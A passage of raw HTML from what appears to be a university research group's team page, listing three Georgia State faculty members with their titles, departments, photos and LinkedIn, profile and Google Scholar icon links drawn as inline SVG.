<!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-SRM-360x360-1.png\" class=\"wp-image-1601 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 